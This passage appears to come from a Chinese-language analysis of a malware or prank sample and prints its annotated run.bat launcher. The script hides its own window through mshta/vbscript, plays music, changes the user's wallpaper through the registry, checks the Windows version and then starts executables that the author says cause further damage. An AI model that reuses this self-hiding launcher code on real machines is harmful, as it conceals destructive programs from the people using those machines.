然后这个是run.bat的代码,bat吧就该说些bat的事情
@echo off 关闭回显!!
@echo off
if "%1"=="h" goto begin
start mshta vbscript:createobject("wscript.shell").run("""%~nx0"" h",0)(window.close)&&exit 隐藏自身啊!!!
:begin
start t.vbs 打开一个播放音乐的脚本
reg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v Wallpaper /d c:\sj\1.bmp /f
RunDll32.exe USER32.DLL,UpdatePerUserSystemParameters 把壁纸设置为他的图片
cls
cls
ver | find "4.0." > NUL && goto win95 检测版本号!!!
ver | find "4.10." > NUL && goto win98
ver | find "4.90." > NUL && goto win_me
ver | find "3.51." > NUL && goto win_Nt_3_5
ver | find "5.0." > NUL && goto win2000
ver | find "5.1." > NUL && goto win_xp
ver | find "5.2." > NUL && goto win2003
ver | find "6.0." > NUL && goto vista
ver | find "6.1." > NUL && goto win7
ver | find "6.2." > NUL && goto win8
goto no
:win95
goto no
:win98
goto no
:win_me
goto no
:win_Nt_3_5
goto no
:win2000
goto no
:win_xp
goto no
:win2003
goto no
:vista
goto no
:win7
goto no
:win8
goto may
goto may
:no
w8d.exe 打开其他的程序进行下一步的破坏!!
goto e
:may
w7u.exe
goto e
:e
pause